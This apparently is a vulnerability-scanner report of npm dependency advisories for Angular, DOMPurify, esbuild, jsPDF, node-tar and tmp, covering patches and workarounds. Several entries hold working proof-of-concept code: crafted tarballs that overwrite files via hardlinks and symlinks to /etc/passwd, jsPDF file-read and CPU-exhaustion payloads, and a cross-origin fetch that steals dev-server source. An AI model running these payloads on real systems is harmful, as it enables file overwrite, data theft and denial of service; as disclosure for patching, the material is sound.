• pkg:npm/%40angular%2Fcommon@18.2.14  (Confidence:Highest)

GHSA-58c5-g7wp-6w37 (NPM)  suppress

The vulnerability is a **Credential Leak by App Logic** that leads to the **unauthorized disclosure of the Cross-Site Request Forgery (XSRF) token** to an attacker-controlled domain.

Angular's HttpClient has a built-in XSRF protection mechanism that works by checking if a request URL starts with a protocol (`http://` or `https://`) to determine if it is cross-origin. If the URL starts with protocol-relative URL (`//`), it is incorrectly treated as a same-origin request, and the XSRF token is automatically added to the `X-XSRF-TOKEN` header.

### Impact
The token leakage completely bypasses Angular's built-in CSRF protection, allowing an attacker to capture the user's valid XSRF token. Once the token is obtained, the attacker can perform arbitrary Cross-Site Request Forgery (CSRF) attacks against the victim user's session.

### Attack Preconditions
1. The victim's Angular application must have **XSRF protection enabled**.  
2. The attacker must be able to make the application send a state-changing HTTP request (e.g., `POST`) to a **protocol-relative URL**  (e.g., `//attacker.com`) that they control.

### Patches
- 19.2.16
- 20.3.14
- 21.0.1

### Workarounds
Developers should avoid using protocol-relative URLs (URLs starting with `//`) in HttpClient requests. All backend communication URLs should be hardcoded as relative paths (starting with a single `/`) or fully qualified, trusted absolute URLs.

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-58c5-g7wp-6w37
• NPM Advisory reference: - https://github.com/angular/angular/commit/0276479e7d0e280e0f8d26fa567d3b7aa97a516f
• NPM Advisory reference: - https://github.com/angular/angular/commit/05fe6686a97fa0bcd3cf157805b3612033f975bc
• NPM Advisory reference: - https://github.com/angular/angular/commit/3240d856d942727372a705252f7c8c115394a41e
• NPM Advisory reference: - https://github.com/angular/angular/releases/tag/19.2.16
• NPM Advisory reference: - https://github.com/angular/angular/releases/tag/20.3.14
• NPM Advisory reference: - https://github.com/angular/angular/releases/tag/21.0.1
• NPM Advisory reference: - https://github.com/angular/angular/security/advisories/GHSA-58c5-g7wp-6w37
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-66035

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:\@angular\/common:\<19.2.16:*:*:*:*:*:*:*

• pkg:npm/%40angular%2Fcompiler@18.2.14  (Confidence:Highest)

GHSA-jrmj-c5cx-3cw6 (NPM)  suppress

A Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular’s internal sanitization schema fails to recognize the `href` and `xlink:href` attributes of SVG `<script>` elements as a **Resource URL** context.

In a standard security model, attributes that can load and execute code (like a script's source) should be strictly validated. However, because the compiler does not classify these specific SVG attributes correctly, it allows attackers to bypass Angular's built-in security protections.

When template binding is used to assign user-controlled data to these attributes for example, `<script [attr.href]="userInput">` the compiler treats the value as a standard string or a non-sensitive URL rather than a resource link. This enables an attacker to provide a malicious payload, such as a `data:text/javascript` URI or a link to an external malicious script.

### Impact
When successfully exploited, this vulnerability allows for **arbitrary JavaScript execution** within the context of the victim's browser session. This can lead to:
- **Session Hijacking:** Stealing session cookies, localStorage data, or authentication tokens.
- **Data Exfiltration:** Accessing and transmitting sensitive information displayed within the application.
- **Unauthorized Actions:** Performing state-changing actions (like clicking buttons or submitting forms) on behalf of the authenticated user.

### Attack Preconditions

1. The victim application must explicitly use SVG `<script>` elements within its templates.
2. The application must use property or attribute binding (interpolation) for the `href` or `xlink:href` attributes of those SVG scripts.
3. The data bound to these attributes must be derived from an untrusted source (e.g., URL parameters, user-submitted database entries, or unsanitized API responses).

### Patches
- 19.2.18
- 20.3.16
- 21.0.7
- 21.1.0-rc.0

### Workarounds
Until the patch is applied, developers should:

- **Avoid Dynamic Bindings**: Do not use Angular template binding (e.g., `[attr.href]`) for SVG `<script>` elements.
- **Input Validation**: If dynamic values must be used, strictly validate the input against a strict allowlist of trusted URLs on the server side or before it reaches the template.

### Resources

- https://github.com/angular/angular/pull/66318

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-jrmj-c5cx-3cw6
• NPM Advisory reference: - https://github.com/angular/angular/commit/91dc91bae4a1bbefc58bef6ef739d0e02ab44d56
• NPM Advisory reference: - https://github.com/angular/angular/pull/66318
• NPM Advisory reference: - https://github.com/angular/angular/security/advisories/GHSA-jrmj-c5cx-3cw6
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-22610

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:\@angular\/compiler:\<\=18.2.14:*:*:*:*:*:*:*

GHSA-v4hv-rgfq-gp49 (NPM)  suppress

A **Stored Cross-Site Scripting ([XSS](https://angular.dev/best-practices/security#preventing-cross-site-scripting-xss))** vulnerability has been identified in the **Angular Template Compiler**. It occurs because the compiler's internal security schema is incomplete, allowing attackers to bypass Angular's built-in security sanitization. Specifically, the schema fails to classify certain URL-holding attributes (e.g., those that could contain [`javascript:` URLs](https://developer.mozilla.org/en-US/Web/URI/Reference/Schemes/javascript)) as requiring strict URL security, enabling the injection of malicious scripts.

Additionally, a related vulnerability exists involving SVG animation elements (`<animate>`, `<set>`, `<animateMotion>`, `<animateTransform>`). The `attributeName` attribute on these elements was not properly validated, allowing attackers to dynamically target security-sensitive attributes like `href` or `xlink:href` on other elements. By binding `attributeName` to "href" and providing a `javascript:` URL in the `values` or `to` attribute, an attacker could bypass sanitization and execute arbitrary code.

Attributes confirmed to be vulnerable include:
*   SVG-related attributes: (e.g., `xlink:href`), and various MathML attributes (e.g., `math|href`, `annotation|href`).
*   SVG animation `attributeName` attribute when bound to "href" or "xlink:href".

When template binding is used to assign untrusted, user-controlled data to these attributes (e.g., `[attr.xlink:href]="maliciousURL"` or `<animate [attributeName]="'href'" [values]="maliciousURL">`), the compiler incorrectly falls back to a non-sanitizing context or fails to block the dangerous attribute assignment. This allows an attacker to inject a `javascript:URL` payload. Upon user interaction (like a click) on the element, or automatically in the case of animations, the malicious JavaScript executes in the context of the application's origin.

### Impact

When exploited, this vulnerability allows an attacker to execute arbitrary code within the context of the vulnerable application's domain. This enables:

* **Session Hijacking:** Stealing session cookies and authentication tokens.  
* **Data Exfiltration:** Capturing and transmitting sensitive user data.  
* **Unauthorized Actions:** Performing actions on behalf of the user.

### Patches

- 19.2.17
- 20.3.15
- 21.0.2

### Attack Preconditions

* The victim's Angular application must render data derived from **untrusted input** (e.g., from a database or API) and bind it to one of the unsanitized URL attributes or the `attributeName` of an SVG animation element.
* The victim must perform a **user interaction** (e.g., clicking) on the compromised element for the stored script to execute, or the animation must trigger the execution.

### Workarounds

If you cannot upgrade, you can workaround the issue by ensuring that any data bound to the vulnerable attributes is never sourced from untrusted user input (e.g., database, API response, URL parameters).

* **Avoid Affected Template Bindings:** Specifically avoid using template bindings (e.g., `[attr.xlink:href]="maliciousURL"`) to assign untrusted data to the vulnerable SVG/MathML attributes.
* **Avoid Dynamic `attributeName` on SVG Animations:** Do not bind untrusted data to the `attributeName` attribute of SVG animation elements (`<animate>`, `<set>`, etc.).
* **Enable [Content Security Policy (CSP)](https://angular.dev/best-practices/security#content-security-policy):** Configure a robust CSP header that disallows `javascript:` URLs.

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-v4hv-rgfq-gp49
• NPM Advisory reference: - https://github.com/angular/angular/commit/1c6b0704fb63d051fab8acff84d076abfbc4893a
• NPM Advisory reference: - https://github.com/angular/angular/security/advisories/GHSA-v4hv-rgfq-gp49
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-66412

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:\@angular\/compiler:\<\=18.2.14:*:*:*:*:*:*:*

• pkg:npm/%40angular%2Fcore@18.2.14  (Confidence:Highest)

GHSA-jrmj-c5cx-3cw6 (NPM)  suppress

A Cross-Site Scripting (XSS) vulnerability has been identified in the Angular Template Compiler. The vulnerability exists because Angular’s internal sanitization schema fails to recognize the `href` and `xlink:href` attributes of SVG `<script>` elements as a **Resource URL** context.

In a standard security model, attributes that can load and execute code (like a script's source) should be strictly validated. However, because the compiler does not classify these specific SVG attributes correctly, it allows attackers to bypass Angular's built-in security protections.

When template binding is used to assign user-controlled data to these attributes for example, `<script [attr.href]="userInput">` the compiler treats the value as a standard string or a non-sensitive URL rather than a resource link. This enables an attacker to provide a malicious payload, such as a `data:text/javascript` URI or a link to an external malicious script.

### Impact
When successfully exploited, this vulnerability allows for **arbitrary JavaScript execution** within the context of the victim's browser session. This can lead to:
- **Session Hijacking:** Stealing session cookies, localStorage data, or authentication tokens.
- **Data Exfiltration:** Accessing and transmitting sensitive information displayed within the application.
- **Unauthorized Actions:** Performing state-changing actions (like clicking buttons or submitting forms) on behalf of the authenticated user.

### Attack Preconditions

1. The victim application must explicitly use SVG `<script>` elements within its templates.
2. The application must use property or attribute binding (interpolation) for the `href` or `xlink:href` attributes of those SVG scripts.
3. The data bound to these attributes must be derived from an untrusted source (e.g., URL parameters, user-submitted database entries, or unsanitized API responses).

### Patches
- 19.2.18
- 20.3.16
- 21.0.7
- 21.1.0-rc.0

### Workarounds
Until the patch is applied, developers should:

- **Avoid Dynamic Bindings**: Do not use Angular template binding (e.g., `[attr.href]`) for SVG `<script>` elements.
- **Input Validation**: If dynamic values must be used, strictly validate the input against a strict allowlist of trusted URLs on the server side or before it reaches the template.

### Resources

- https://github.com/angular/angular/pull/66318

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-jrmj-c5cx-3cw6
• NPM Advisory reference: - https://github.com/angular/angular/commit/91dc91bae4a1bbefc58bef6ef739d0e02ab44d56
• NPM Advisory reference: - https://github.com/angular/angular/pull/66318
• NPM Advisory reference: - https://github.com/angular/angular/security/advisories/GHSA-jrmj-c5cx-3cw6
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-22610

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:\@angular\/core:\<\=18.2.14:*:*:*:*:*:*:*

• pkg:javascript/DOMPurify@2.5.8  (Confidence:Highest)

CVE-2025-26791  suppress

DOMPurify before 3.2.4 has an incorrect template literal regular expression, sometimes leading to mutation cross-site scripting (mXSS).

• Base Score: MEDIUM (6.1)
• Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A

• 134c704f-9b21-4f2e-91b3-4a467353bcc0 - EXPLOIT,THIRD_PARTY_ADVISORY
• cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY
• cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY
• cve@mitre.org - PATCH
• cve@mitre.org - RELEASE_NOTES
• info - https://ensy.zip/posts/dompurify-323-bypass
• info - https://github.com/advisories/GHSA-vhxf-7vqr-mrjg
• info - https://github.com/cure53/DOMPurify
• info - https://github.com/cure53/DOMPurify/commit/d18ffcb554e0001748865da03ac75dd7829f0f02
• info - https://github.com/cure53/DOMPurify/releases/tag/3.2.4
• info - https://nsysean.github.io/posts/dompurify-323-bypass
• info - https://nvd.nist.gov/vuln/detail/CVE-2025-26791

Vulnerable Software & Versions (NVD):

• cpe:2.3:a:cure53:dompurify:*:*:*:*:*:*:*:* versions up to (excluding) 3.2.4

• pkg:npm/esbuild@0.21.5  (Confidence:Highest)

GHSA-67mh-4wv8-2f99 (NPM)  suppress

### Summary

esbuild allows any websites to send any request to the development server and read the response due to default CORS settings.

### Details

esbuild sets `Access-Control-Allow-Origin: *` header to all requests, including the SSE connection, which allows any websites to send any request to the development server and read the response.

https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L121
https://github.com/evanw/esbuild/blob/df815ac27b84f8b34374c9182a93c94718f8a630/pkg/api/serve_other.go#L363

**Attack scenario**:

1. The attacker serves a malicious web page (`http://malicious.example.com`).
1. The user accesses the malicious web page.
1. The attacker sends a `fetch('http://127.0.0.1:8000/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.
1. The attacker gets the content of `http://127.0.0.1:8000/main.js`.

In this scenario, I assumed that the attacker knows the URL of the bundle output file name. But the attacker can also get that information by

- Fetching `/index.html`: normally you have a script tag here
- Fetching `/assets`: it's common to have a `assets` directory when you have JS files and CSS files in a different directory and the directory listing feature tells the attacker the list of files
- Connecting `/esbuild` SSE endpoint: the SSE endpoint sends the URL path of the changed files when the file is changed (`new EventSource('/esbuild').addEventListener('change', e => console.log(e.type, e.data))`)
- Fetching URLs in the known file: once the attacker knows one file, the attacker can know the URLs imported from that file

The scenario above fetches the compiled content, but if the victim has the source map option enabled, the attacker can also get the non-compiled content by fetching the source map file.

### PoC

1. Download [reproduction.zip](https://github.com/user-attachments/files/18561484/reproduction.zip)
2. Extract it and move to that directory
1. Run `npm i`
1. Run `npm run watch`
1. Run `fetch('http://127.0.0.1:8000/app.js').then(r => r.text()).then(content => console.log(content))` in a different website's dev tools.

![image](https://github.com/user-attachments/assets/08fc2e4d-e1ec-44ca-b0ea-78a73c3c40e9)

### Impact

Users using the serve feature may get the source code stolen by malicious websites.

• Base Score: MEDIUM (5.300000190734863)
• Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N

• Severity: moderate

• NPM Advisory reference: - https://github.com/advisories/GHSA-67mh-4wv8-2f99
• NPM Advisory reference: - https://github.com/evanw/esbuild/commit/de85afd65edec9ebc44a11e245fd9e9a2e99760d
• NPM Advisory reference: - https://github.com/evanw/esbuild/security/advisories/GHSA-67mh-4wv8-2f99

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:esbuild:\<\=0.24.2:*:*:*:*:*:*:*

• pkg:npm/jspdf@2.5.2  (Confidence:Highest)

GHSA-f8cm-6447-x5h2 (NPM)  suppress

### Impact
User control of the first argument of the loadFile method in the node.js build allows local file inclusion/path traversal.

If given the possibility to pass unsanitized paths to the loadFile method, a user can retrieve file contents of arbitrary files in the local file system the node process is running in. The file contents are included verbatim in the generated PDFs.

Other affected methods are: `addImage`, `html`, `addFont`.

Only the node.js builds of the library are affected, namely the `dist/jspdf.node.js` and `dist/jspdf.node.min.js` files.

Example attack vector:

```js
import { jsPDF } from "./dist/jspdf.node.js";

const doc = new jsPDF();

doc.addImage("./secret.txt", "JPEG", 0, 0, 10, 10);
doc.save("test.pdf"); // the generated PDF will contain the "secret.txt" file
```

### Patches
The vulnerability has been fixed in jsPDF@4.0.0. This version restricts file system access per default. This semver-major update does not introduce other breaking changes.

### Workarounds
With recent node versions, jsPDF recommends using the `--permission` flag in production. The feature was introduced experimentally in v20.0.0 and is stable since v22.13.0/v23.5.0/v24.0.0. See the [node documentation](https://nodejs.org/api/permissions.html) for details.

For older node versions, sanitize user-provided paths before passing them to jsPDF.

### Credits
Researcher: kilkat (Kwangwoon Kim)

• Severity: critical

• NPM Advisory reference: - https://github.com/advisories/GHSA-f8cm-6447-x5h2
• NPM Advisory reference: - https://github.com/parallax/jsPDF/commit/a688c8f479929b24a6543b1fa2d6364abb03066d
• NPM Advisory reference: - https://github.com/parallax/jsPDF/releases/tag/v4.0.0
• NPM Advisory reference: - https://github.com/parallax/jsPDF/security/advisories/GHSA-f8cm-6447-x5h2
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-68428

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:jspdf:\<\=3.0.4:*:*:*:*:*:*:*

GHSA-8mvj-3j78-4qmw (NPM)  suppress

### Impact
User control of the first argument of the addImage method results in CPU utilization and denial of service.

If given the possibility to pass unsanitized image data or URLs to the addImage method, a user can provide a harmful PNG file that results in high CPU utilization and denial of service.

Other affected methods are: `html`.

Example payload:

```js
import { jsPDF } from "jspdf" 

const payload = new Uint8Array([117, 171, 90, 253, 166, 154, 105, 166, 154])

const doc = new jsPDF();
const startTime = performance.now();
try {
  doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} finally {
  const endTime = performance.now();
  console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`);
}
```

### Patches
The vulnerability was fixed in jsPDF 3.0.2. Upgrade to jspdf@>=3.0.2.

In jspdf@>=3.0.2, invalid PNG files throw an Error instead of causing very long running loops.

### Workarounds
Sanitize image data or URLs before passing it to the addImage method or one of the other affected methods.

### Credits
Researcher: Aleksey Solovev (Positive Technologies)

• Base Score: HIGH (7.5)
• Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-8mvj-3j78-4qmw
• NPM Advisory reference: - https://github.com/parallax/jsPDF/commit/4cf3ab619e565d9b88b4b130bff901b91d8688e9
• NPM Advisory reference: - https://github.com/parallax/jsPDF/pull/3880
• NPM Advisory reference: - https://github.com/parallax/jsPDF/releases/tag/v3.0.2
• NPM Advisory reference: - https://github.com/parallax/jsPDF/security/advisories/GHSA-8mvj-3j78-4qmw
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-57810

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:jspdf:\<\=3.0.1:*:*:*:*:*:*:*

GHSA-w532-jxjh-hjhj (NPM)  suppress

### Impact
User control of the first argument of the `addImage` method results in CPU utilization and denial of service.

If given the possibility to pass unsanitized image urls to the `addImage` method, a user can provide a harmful data-url that results in high CPU utilization and denial of service.

Other affected methods are: `html`, `addSvgAsImage`.

Example payload:
```js
import { jsPDF } from "jpsdf" 

const doc = new jsPDF();
const payload = 'data:/charset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=scharset=s\x00base64,undefined';

const startTime = performance.now()

try {
 doc.addImage(payload, "PNG", 10, 40, 180, 180, undefined, "SLOW");
} catch (err) {
  const endTime = performance.now()
  console.log(`Call to doc.addImage took ${endTime - startTime} milliseconds`)
}

doc.save("a4.pdf");
```

### Patches
The vulnerability was fixed in jsPDF 3.0.1. Upgrade to jspdf@>=3.0.1

### Workarounds
Sanitize image urls before passing it to the `addImage` method or one of the other affected methods.

### Credits
Researcher: Aleksey Solovev (Positive Technologies)

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-w532-jxjh-hjhj
• NPM Advisory reference: - https://github.com/parallax/jsPDF/commit/b167c43c27c466eb914b927885b06073708338df
• NPM Advisory reference: - https://github.com/parallax/jsPDF/security/advisories/GHSA-w532-jxjh-hjhj
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-29907

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:jspdf:\<3.0.1:*:*:*:*:*:*:*

• pkg:npm/tar@6.2.1  (Confidence:Highest)

GHSA-r6q2-hw4h-h46w (NPM)  suppress

**TITLE**: Race Condition in node-tar Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS

**AUTHOR**: Tomás Illuminati

### Details

A race condition vulnerability exists in `node-tar` (v7.5.3) this is to an incomplete handling of Unicode path collisions in the `path-reservations` system. On case-insensitive or normalization-insensitive filesystems (such as macOS APFS, In which it has been tested), the library fails to lock colliding paths (e.g., `ß` and `ss`), allowing them to be processed in parallel. This bypasses the library's internal concurrency safeguards and permits Symlink Poisoning attacks via race conditions. The library uses a `PathReservations` system to ensure that metadata checks and file operations for the same path are serialized. This prevents race conditions where one entry might clobber another concurrently.

```typescript
// node-tar/src/path-reservations.ts (Lines 53-62)
reserve(paths: string[], fn: Handler) {
    paths =
      isWindows ?
        ['win32 parallelization disabled']
      : paths.map(p => {
          return stripTrailingSlashes(
            join(normalizeUnicode(p)), // <- THE PROBLEM FOR MacOS FS
          ).toLowerCase()
        })

```

In MacOS the ```join(normalizeUnicode(p)), ``` FS confuses ß with ss, but this code does not. For example:

``````bash
bash-3.2$ printf "CONTENT_SS\n" > collision_test_ss
bash-3.2$ ls
collision_test_ss
bash-3.2$ printf "CONTENT_ESSZETT\n" > collision_test_ß
bash-3.2$ ls -la
total 8
drwxr-xr-x   3 testuser  staff    96 Jan 19 01:25 .
drwxr-x---+ 82 testuser  staff  2624 Jan 19 01:25 ..
-rw-r--r--   1 testuser  staff    16 Jan 19 01:26 collision_test_ss
bash-3.2$ 
``````

---

### PoC

``````javascript
const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('\[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

``````

---

### Impact
This is a **Race Condition** which enables **Arbitrary File Overwrite**. This vulnerability affects users and systems using **node-tar on macOS (APFS/HFS+)**. Because of using `NFD` Unicode normalization (in which `ß` and `ss` are different), conflicting paths do not have their order properly preserved under filesystems that ignore Unicode normalization (e.g., APFS (in which `ß` causes an inode collision with `ss`)). This enables an attacker to circumvent internal parallelization locks (`PathReservations`) using conflicting filenames within a malicious tar archive.

---

### Remediation

Update `path-reservations.js` to use a normalization form that matches the target filesystem's behavior (e.g., `NFKD`), followed by first `toLocaleLowerCase('en')` and then `toLocaleUpperCase('en')`.

Users who cannot upgrade promptly, and who are programmatically using `node-tar` to extract arbitrary tarball data should filter out all `SymbolicLink` entries (as npm does) to defend against arbitrary file writes via this file system entry name collision issue.

---

• Base Score: HIGH (8.800000190734863)
• Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:L

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-r6q2-hw4h-h46w
• NPM Advisory reference: - https://github.com/isaacs/node-tar/commit/3b1abfae650056edfabcbe0a0df5954d390521e6
• NPM Advisory reference: - https://github.com/isaacs/node-tar/security/advisories/GHSA-r6q2-hw4h-h46w
• NPM Advisory reference: - https://nvd.nist.gov/vuln/detail/CVE-2026-23950

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:tar:\<\=7.5.3:*:*:*:*:*:*:*

GHSA-8qq5-rm4j-mr97 (NPM)  suppress

### Summary

The `node-tar` library (`<= 7.5.2`) fails to sanitize the `linkpath` of `Link` (hardlink) and `SymbolicLink` entries when `preservePaths` is false (the default secure behavior). This allows malicious archives to bypass the extraction root restriction, leading to **Arbitrary File Overwrite** via hardlinks and **Symlink Poisoning** via absolute symlink targets.

### Details

The vulnerability exists in `src/unpack.ts` within the `[HARDLINK]` and `[SYMLINK]` methods.

**1. Hardlink Escape (Arbitrary File Overwrite)**

The extraction logic uses `path.resolve(this.cwd, entry.linkpath)` to determine the hardlink target. Standard Node.js behavior dictates that if the second argument (`entry.linkpath`) is an **absolute path**, `path.resolve` ignores the first argument (`this.cwd`) entirely and returns the absolute path.

The library fails to validate that this resolved target remains within the extraction root. A malicious archive can create a hardlink to a sensitive file on the host (e.g., `/etc/passwd`) and subsequently write to it, if file permissions allow writing to the target file, bypassing path-based security measures that may be in place.

**2. Symlink Poisoning**

The extraction logic passes the user-supplied `entry.linkpath` directly to `fs.symlink` without validation. This allows the creation of symbolic links pointing to sensitive absolute system paths or traversing paths (`../../`), even when secure extraction defaults are used.

### PoC

The following script generates a binary TAR archive containing malicious headers (a hardlink to a local file and a symlink to `/etc/passwd`). It then extracts the archive using standard `node-tar` settings and demonstrates the vulnerability by verifying that the local "secret" file was successfully overwritten.

```javascript
const fs = require('fs')
const path = require('path')
const tar = require('tar')

const out = path.resolve('out_repro')
const secret = path.resolve('secret.txt')
const tarFile = path.resolve('exploit.tar')
const targetSym = '/etc/passwd'

// Cleanup & Setup
try { fs.rmSync(out, {recursive:true, force:true}); fs.unlinkSync(secret) } catch {}
fs.mkdirSync(out)
fs.writeFileSync(secret, 'ORIGINAL_DATA')

// 1. Craft malicious Link header (Hardlink to absolute local file)
const h1 = new tar.Header({
  path: 'exploit_hard',
  type: 'Link',
  size: 0,
  linkpath: secret 
})
h1.encode()

// 2. Craft malicious Symlink header (Symlink to /etc/passwd)
const h2 = new tar.Header({
  path: 'exploit_sym',
  type: 'SymbolicLink',
  size: 0,
  linkpath: targetSym 
})
h2.encode()

// Write binary tar
fs.writeFileSync(tarFile, Buffer.concat([ h1.block, h2.block, Buffer.alloc(1024) ]))

console.log('[*] Extracting malicious tarball...')

// 3. Extract with default secure settings
tar.x({
  cwd: out,
  file: tarFile,
  preservePaths: false
}).then(() => {
  console.log('[*] Verifying payload...')

  // Test Hardlink Overwrite
  try {
    fs.writeFileSync(path.join(out, 'exploit_hard'), 'OVERWRITTEN')
    
    if (fs.readFileSync(secret, 'utf8') === 'OVERWRITTEN') {
      console.log('[+] VULN CONFIRMED: Hardlink overwrite successful')
    } else {
      console.log('[-] Hardlink failed')
    }
  } catch (e) {}

  // Test Symlink Poisoning
  try {
    if (fs.readlinkSync(path.join(out, 'exploit_sym')) === targetSym) {
      console.log('[+] VULN CONFIRMED: Symlink points to absolute path')
    } else {
      console.log('[-] Symlink failed')
    }
  } catch (e) {}
})

```

### Impact

* **Arbitrary File Overwrite:** An attacker can overwrite any file the extraction process has access to, bypassing path-based security restrictions. It does not grant write access to files that the extraction process does not otherwise have access to, such as root-owned configuration files.
* **Remote Code Execution (RCE):** In CI/CD environments or automated pipelines, overwriting configuration files, scripts, or binaries leads to code execution. (However, npm is unaffected, as it filters out all `Link` and `SymbolicLink` tar entries from extracted packages.)

• Severity: high

• NPM Advisory reference: - https://github.com/advisories/GHSA-8qq5-rm4j-mr97
• NPM Advisory reference: - https://github.com/isaacs/node-tar/commit/340eb285b6d986e91969a1170d7fe9b0face405e
• NPM Advisory reference: - https://github.com/isaacs/node-tar/security/advisories/GHSA-8qq5-rm4j-mr97

Vulnerable Software & Versions (NPM):

• cpe:2.3:a:*:tar:\<\=7.5.2:*:*:*:*:*:*:*

• pkg:npm/tmp@0.0.33  (Confidence:Highest)

GHSA-52f5-9888-hmc6 (NPM)  suppress

### Summary

`tmp@0.2.3` is vulnerable to an Arbitrary temporary file / directory write via symbolic link `dir` parameter.


### Details

According to the documentation there are some conditions that must be held:

```
// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L41-L50

Other breaking changes, i.e.

- template must be relative to tmpdir
- name must be relative to tmpdir
- dir option must be relative to tmpdir //<-- this assumption can be bypassed using symlinks

are still in place.

In order to override the system's tmpdir, you will have to use the newly
introduced tmpdir option.


// https://github.com/raszi/node-tmp/blob/v0.2.3/README.md?plain=1#L375
* `dir`: the optional temporary directory that must be relative to the system's default temporary directory.
     absolute paths are fine as long as they point to a location under the system's default temporary directory.
     Any directories along the so specified path must exist, otherwise a ENOENT error will be thrown upon access, 
     as tmp will not check the availability of the path, nor will it establish the requested path for you.
```

Related issue: https://github.com/raszi/node-tmp/issues/207.


The issue occurs because `_resolvePath` does not properly handle symbolic link when resolving paths:
```js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L573-L579
function _resolvePath(name, tmpDir) {
  if (name.startsWith(tmpDir)) {
    return path.resolve(name);
  } else {
    return path.resolve(path.join(tmpDir, name));
  }
}
```

If the `dir` parameter points to a symlink that resolves to a folder outside the `tmpDir`, it's possible to bypass the `_assertIsRelative` check used in `_assertAndSanitizeOptions`:
```js
// https://github.com/raszi/node-tmp/blob/v0.2.3/lib/tmp.js#L590-L609
function _assertIsRelative(name, option, tmpDir) {
  if (option === 'name') {
    // assert that name is not absolute and does not contain a path
    if (path.isAbsolute(name))
      throw new Error(`${option} option must not contain an absolute path, found "${name}".`);
    // must not fail on valid .<name> or ..<name> or similar such constructs
    let basename = path.basename(name);
    if (basename === '..' || basename === '.' || basename !== name)
      throw new Error(`${option} option must not contain a path, found "${name}".`);
  }
  else { // if (option === 'dir' || option === 'template') {
    // assert that dir or template are relative to tmpDir
    if (path.isAbsolute(name) && !name.startsWith(tmpDir)) {
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${name}".`);
    }
    let resolvedPath = _resolvePath(name, tmpDir); //<--- 
    if (!resolvedPath.startsWith(tmpDir))
      throw new Error(`${option} option must be relative to "${tmpDir}", found "${resolvedPath}".`);
  }
}
```


### PoC

The following PoC demonstrates how writing a tmp file on a folder outside the `tmpDir` is possible.
Tested on a Linux machine.

- Setup: create a symbolic link inside the `tmpDir` that points to a directory outside of it
```bash
mkdir $HOME/mydir1

ln -s $HOME/mydir1 ${TMPDIR:-/tmp}/evil-dir
```

- check the folder is empty:
```bash
